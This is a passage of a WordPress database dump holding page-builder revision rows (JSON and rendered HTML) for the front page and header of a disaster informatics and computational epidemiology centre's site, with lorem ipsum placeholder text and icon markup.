</div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',22,'https://gsudice.dataconn.net/?p=325',0,'revision','',0),(329,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',168,'https://gsudice.dataconn.net/?p=329',0,'revision','',0),(330,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',20,'https://gsudice.dataconn.net/?p=330',0,'revision','',0),(331,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',23,'https://gsudice.dataconn.net/?p=331',0,'revision','',0),(332,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all 